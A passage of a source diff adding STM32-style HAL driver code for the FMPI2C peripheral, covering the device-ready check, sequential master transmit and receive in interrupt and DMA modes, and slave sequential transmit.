(dmaxferstatus == HAL_OK) + { + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_GENERATE_START_READ); + + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR and NACK interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_ERROR_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_RXDMAEN; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Checks if target device is ready for communication. + * @note This function is used with Memory devices + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param Trials Number of trials + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_IsDeviceReady(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint32_t Trials, + uint32_t Timeout) +{ + uint32_t tickstart; + + __IO uint32_t FMPI2C_Trials = 0UL; + + FlagStatus tmp1; + FlagStatus tmp2; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + do + { + /* Generate Start */ + hfmpi2c->Instance->CR2 = FMPI2C_GENERATE_START(hfmpi2c->Init.AddressingMode, DevAddress); + + /* No need to Check TC flag, with AUTOEND mode the stop is automatically generated */ + /* Wait until STOPF flag is set or a NACK flag is set*/ + tickstart = HAL_GetTick(); + + tmp1 = __HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + tmp2 = __HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + while ((tmp1 == RESET) && (tmp2 == RESET)) + { + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + + tmp1 = __HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + tmp2 = __HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + } + + /* Check if the NACKF flag has not been set */ + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_AF) == RESET) + { + /* Wait until STOPF flag is reset */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_STOPF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Device is ready */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + /* Wait until STOPF flag is reset */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_STOPF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Clear STOP Flag, auto generated with autoend*/ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + } + + /* Check if the maximum allowed number of trials has been reached */ + if (FMPI2C_Trials == Trials) + { + /* Generate Stop */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_STOP; + + /* Wait until STOPF flag is reset */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_STOPF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + } + + /* Increment Trials */ + FMPI2C_Trials++; + } while (FMPI2C_Trials < Trials); + + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential transmit in master FMPI2C mode an amount of data in non-blocking mode with Interrupt. + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPI2C_XFEROPTIONS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Seq_Transmit_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size, uint32_t XferOptions) +{ + uint32_t xfermode; + uint32_t xferrequest = FMPI2C_GENERATE_START_WRITE; + + /* Check the parameters */ + assert_param(IS_FMPI2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = XferOptions; + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + /* If hfmpi2c->XferCount > MAX_NBYTE_SIZE, use reload mode */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = hfmpi2c->XferOptions; + } + + /* If transfer direction not change and there is no request to start another frame, + do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((hfmpi2c->PreviousState == FMPI2C_STATE_MASTER_BUSY_TX) && \ + (IS_FMPI2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 0)) + { + xferrequest = FMPI2C_NO_STARTSTOP; + } + else + { + /* Convert OTHER_xxx XferOptions if any */ + FMPI2C_ConvertOtherXferOptions(hfmpi2c); + + /* Update xfermode accordingly if no reload is necessary */ + if (hfmpi2c->XferCount <= MAX_NBYTE_SIZE) + { + xfermode = hfmpi2c->XferOptions; + } + } + + /* Send Slave Address and set NBYTES to write */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, xferrequest); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential transmit in master FMPI2C mode an amount of data in non-blocking mode with DMA. + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPI2C_XFEROPTIONS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Seq_Transmit_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size, uint32_t XferOptions) +{ + uint32_t xfermode; + uint32_t xferrequest = FMPI2C_GENERATE_START_WRITE; + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_FMPI2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = XferOptions; + hfmpi2c->XferISR = FMPI2C_Master_ISR_DMA; + + /* If hfmpi2c->XferCount > MAX_NBYTE_SIZE, use reload mode */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = hfmpi2c->XferOptions; + } + + /* If transfer direction not change and there is no request to start another frame, + do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((hfmpi2c->PreviousState == FMPI2C_STATE_MASTER_BUSY_TX) && \ + (IS_FMPI2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 0)) + { + xferrequest = FMPI2C_NO_STARTSTOP; + } + else + { + /* Convert OTHER_xxx XferOptions if any */ + FMPI2C_ConvertOtherXferOptions(hfmpi2c); + + /* Update xfermode accordingly if no reload is necessary */ + if (hfmpi2c->XferCount <= MAX_NBYTE_SIZE) + { + xfermode = hfmpi2c->XferOptions; + } + } + + if (hfmpi2c->XferSize > 0U) + { + if (hfmpi2c->hdmatx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmatx->XferCpltCallback = FMPI2C_DMAMasterTransmitCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmatx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmatx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmatx, (uint32_t)pData, (uint32_t)&hfmpi2c->Instance->TXDR, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Send Slave Address and set NBYTES to write */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, xferrequest); + + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR and NACK interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_ERROR_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_TXDMAEN; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + else + { + /* Update Transfer ISR function pointer */ + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + /* Send Slave Address */ + /* Set NBYTES to write and generate START condition */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_GENERATE_START_WRITE); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR, TC, STOP, NACK, TXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential receive in master FMPI2C mode an amount of data in non-blocking mode with Interrupt + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPI2C_XFEROPTIONS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Seq_Receive_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size, uint32_t XferOptions) +{ + uint32_t xfermode; + uint32_t xferrequest = FMPI2C_GENERATE_START_READ; + + /* Check the parameters */ + assert_param(IS_FMPI2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = XferOptions; + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + /* If hfmpi2c->XferCount > MAX_NBYTE_SIZE, use reload mode */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = hfmpi2c->XferOptions; + } + + /* If transfer direction not change and there is no request to start another frame, + do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((hfmpi2c->PreviousState == FMPI2C_STATE_MASTER_BUSY_RX) && \ + (IS_FMPI2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 0)) + { + xferrequest = FMPI2C_NO_STARTSTOP; + } + else + { + /* Convert OTHER_xxx XferOptions if any */ + FMPI2C_ConvertOtherXferOptions(hfmpi2c); + + /* Update xfermode accordingly if no reload is necessary */ + if (hfmpi2c->XferCount <= MAX_NBYTE_SIZE) + { + xfermode = hfmpi2c->XferOptions; + } + } + + /* Send Slave Address and set NBYTES to read */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, xferrequest); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential receive in master FMPI2C mode an amount of data in non-blocking mode with DMA + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPI2C_XFEROPTIONS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Seq_Receive_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size, uint32_t XferOptions) +{ + uint32_t xfermode; + uint32_t xferrequest = FMPI2C_GENERATE_START_READ; + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_FMPI2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = XferOptions; + hfmpi2c->XferISR = FMPI2C_Master_ISR_DMA; + + /* If hfmpi2c->XferCount > MAX_NBYTE_SIZE, use reload mode */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = hfmpi2c->XferOptions; + } + + /* If transfer direction not change and there is no request to start another frame, + do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + if ((hfmpi2c->PreviousState == FMPI2C_STATE_MASTER_BUSY_RX) && \ + (IS_FMPI2C_TRANSFER_OTHER_OPTIONS_REQUEST(XferOptions) == 0)) + { + xferrequest = FMPI2C_NO_STARTSTOP; + } + else + { + /* Convert OTHER_xxx XferOptions if any */ + FMPI2C_ConvertOtherXferOptions(hfmpi2c); + + /* Update xfermode accordingly if no reload is necessary */ + if (hfmpi2c->XferCount <= MAX_NBYTE_SIZE) + { + xfermode = hfmpi2c->XferOptions; + } + } + + if (hfmpi2c->XferSize > 0U) + { + if (hfmpi2c->hdmarx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmarx->XferCpltCallback = FMPI2C_DMAMasterReceiveCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmarx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmarx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmarx, (uint32_t)&hfmpi2c->Instance->RXDR, (uint32_t)pData, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Send Slave Address and set NBYTES to read */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, xferrequest); + + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR and NACK interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_ERROR_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_RXDMAEN; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + else + { + /* Update Transfer ISR function pointer */ + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + /* Send Slave Address */ + /* Set NBYTES to read and generate START condition */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_GENERATE_START_READ); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR, TC, STOP, NACK, TXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sequential transmit in slave/device FMPI2C mode an amount of data in non-blocking mode with Interrupt + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPI2C_XFEROPTIONS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Seq_Transmit_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size, + uint32_t XferOptions) +{ + /* Check the parameters */ + assert_param(IS_FMPI2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (((uint32_t)hfmpi2c->State & (uint32_t)HAL_FMPI2C_STATE_LISTEN) == (uint32_t)HAL_FMPI2C_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + /* Disable Interrupts, to prevent preemption during treatment in case of multicall */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT | FMPI2C_XFER_TX_IT); + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* FMPI2C cannot manage full duplex exchange so disable previous IT enabled if any */ + /* and then toggle the HAL slave RX state to TX state */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX_LISTEN) + { + /* Disable associated Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + + /* Abort DMA Xfer if any */ + if ((hfmpi2c->Instance->CR1 & FMPI2C_CR1_RXDMAEN) == FMPI2C_CR1_RXDMAEN) + { + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_RXDMAEN; + + if (hfmpi2c->hdmarx != NULL) + { + /* Set the FMPI2C DMA Abort callback : + will lead to call HAL_FMPI2C_ErrorCallback() at end of DMA abort procedure */ + hfmpi2c->hdmarx->XferAbortCallback = FMPI2C_DMAAbort; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hfmpi2c->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hfmpi2c->hdmarx->XferAbortCallback(hfmpi2c->hdmarx); + } + } + } + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferSize = hfmpi2c->XferCount; + hfmpi2c->XferOptions = XferOptions; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_IT; + + if (FMPI2C_GET_DIR(hfmpi2c) == FMPI2C_DIRECTION_RECEIVE) + { + /* Clear ADDR flag after prepare the transfer parameters */ + /* This action will generate an acknowledge to the Master */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* REnable ADDR interrupt */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT | FMPI2C_XFER_LISTEN_IT); + + return HAL_OK; + } + else + { + return HAL_ERROR; + } +} + +/** + * @brief Sequential transmit in slave/device FMPI2C mode an amount of data in non-blocking mode with DMA + * @note This interface allow to manage repeated start condition when a direction change during transfer + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPI2C_XFEROPTIONS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Seq_Transmit_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size, + uint32_t XferOptions) +{ + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_FMPI2C_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (((uint32_t)hfmpi2c->State & (uint32_t)HAL_FMPI2C_STATE_LISTEN) == (uint32_t)HAL_FMPI2C_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Disable Interrupts, to prevent preemption during treatment in case of multicall */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT | FMPI2C_XFER_TX_IT); + + /* FMPI2C cannot manage full duplex exchange so disable previous IT enabled if any */ + /* and then toggle the HAL slave RX state to TX state */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX_LISTEN) + { + /* Disable associated Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + + if ((hfmpi2c->Instance->CR1 & FMPI2C_CR1_RXDMAEN) == FMPI2C_CR1_RXDMAEN) + { + /* Abort DMA Xfer if any */ + if (hfmpi2c->hdmarx != NULL) + { + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_RXDMAEN; + + /* Set the FMPI2C DMA Abort callback : + will lead to call HAL_FMPI2C_ErrorCallback() at end of DMA abort procedure */ + hfmpi2c->hdmarx->XferAbortCallback = FMPI2C_DMAAbort; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hfmpi2c->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hfmpi2c->hdmarx->XferAbortCallback(hfmpi2c->hdmarx); + } + } + } + } + else if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX_LISTEN) + { + if ((hfmpi2c->Instance->CR1 & FMPI2C_CR1_TXDMAEN) == FMPI2C_CR1_TXDMAEN) + { + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_TXDMAEN; + + /* Abort DMA Xfer if any */ + if (hfmpi2c->hdmatx != NULL) + { + /* Set the FMPI2C DMA Abort callback : + will lead to call HAL_FMPI2C_ErrorCallback() at end of DMA abort procedure */ + hfmpi2c->hdmatx->XferAbortCallback = FMPI2C_DMAAbort; + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hfmpi2c->hdmatx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hfmpi2c->hdmatx->XferAbortCallback(hfmpi2c->hdmatx); + } + } + } + } + else + { + /* Nothing to do */ + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + 